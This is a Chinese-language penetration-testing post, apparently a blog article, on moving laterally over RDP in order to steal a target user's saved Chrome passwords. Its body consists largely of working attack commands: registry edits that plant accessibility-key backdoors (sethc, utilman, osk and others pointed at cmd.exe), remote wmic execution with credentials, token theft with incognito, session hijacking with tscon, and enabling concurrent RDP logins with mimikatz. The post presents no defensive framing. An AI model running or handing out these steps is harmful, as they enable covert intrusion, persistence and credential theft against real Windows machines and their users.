通过RDP协议横向移动

背景:

想去目标机器上抓chrome密码,但是用户的ntlm hash解不开,导致不能去解密chrome密码,3389端口是开着的,win7机器默认不允许多用户登录,贸然上去怕被用户发觉。

《通过RDP协议横向移动》

思路一:

445端口开启可以通过wmic执行命令替换快捷键

快捷键后门

osk.exe
    reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsosk.exe" /v "Debugger" /t REG_SZ /d "C:windowssystem32cmd.exe" /f
    
sethc
    REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /t REG_SZ /v Debugger /d "C:windowssystem32cmd.exe" /f
    
    
utilman
    REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsutilman.exe" /t REG_SZ /v Debugger /d "C:windowssystem32cmd.exe" /f
   
magnify
    REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmagnify.exe" /t REG_SZ /v Debugger /d "C:windowssystem32cmd.exe" /f
    
narrator
    REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsnarrator.exe" /t REG_SZ /v Debugger /d "C:windowssystem32cmd.exe" /f
    
DisplaySwitch
    REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsDisplaySwitch.exe" /t REG_SZ /v Debugger /d "C:windowssystem32cmd.exe" /f
    
AtBroker
    REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsAtBroker.exe" /t REG_SZ /v Debugger /d "C:windowssystem32cmd.exe" /f

替换命令

wmic /node:"192.168.1.152" /user:"administrator" /password:"123" process call create "REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /t REG_SZ /v Debugger /d "C:windowssystem32cmd.exe" /f"

3389连之

《通过RDP协议横向移动》

这样可以获取到一个shell

system用户无法解密密码

《通过RDP协议横向移动》

通过窃取目标用户token这样就可以调用windows api进行解密了

incognito.exe list_tokens -u

《通过RDP协议横向移动》

窃取tomcat用户token

incognito.exe execute -c "WIN-7EF724SF4OFtomcat" cmd.exe

《通过RDP协议横向移动》

《通过RDP协议横向移动》

思路二、tscon

直接切换目标用户上去抓密码,但是该动作风险性比较高

《通过RDP协议横向移动》

直接就进来了

《通过RDP协议横向移动》

但是这样会把用户挤下去

思路三、开启多用户登录

mimikatz执行

mimikatzx.exe privilege::debug ts::multirdp exit

《通过RDP协议横向移动》

这样就可以直接登录了

《通过RDP协议横向移动》

本文来自ringk3y,经授权后发布,本文观点不代表MottoIN立场,转载请联系原作者。

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code